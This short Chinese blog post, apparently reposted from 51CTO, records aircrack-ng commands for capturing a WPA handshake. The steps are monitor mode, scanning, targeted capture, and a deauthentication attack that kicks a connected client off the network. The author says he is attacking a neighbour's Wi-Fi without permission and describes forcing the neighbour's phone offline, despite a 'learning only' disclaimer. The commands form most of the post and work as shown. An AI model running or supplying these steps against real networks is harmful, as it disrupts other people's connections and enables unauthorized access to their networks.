这篇文章问什么技术含量,因为东哥记性不好,目的是为了记录一下命令,大家凑合看看不要当真。本教程只作为学习研究之用,不能用于非法用途!!!
首先开启无线网卡混杂模式,wlan1是东哥支持蹭网的便携神器,之前文章有介绍。
1
|
airmon-ng start wlan1
|
然后看看周围存在的热点,觊觎邻居家的无线网络很久了:)
1
|
airodump-ng mon1
|
然后开始监听目标网络,通过--ivs过滤无用数据包,--bssid过滤其他AP,获取成功后右上角会有显示。
1
|
airodump-ng --ivs -bssid AP的MAC地址 -w 握手包文件名 mon1
|
然后对目标AP发起死亡攻击,邻居家貌似就一个手机在连接,好久才搞到握手包。如果AP正在下载电影,很快就能获取到握手包。--ignore-negative-one 如果AP工作频道不确定加上,客户端MAC地址在之前通过airodump-ng获取。
1
|
aireplay-ng --ignore-negative-one -0 10 -a AP的MAC地址 -c 客户端的MAC地址 mon1
|
最后我们可以看到获取到的握手包。
如何进行字典破解,下回再讲。
本文转自文东会博客51CTO博客,原文链接http://blog.51cto.com/hackerwang/1404748如需转载请自行联系原作者
谢文东666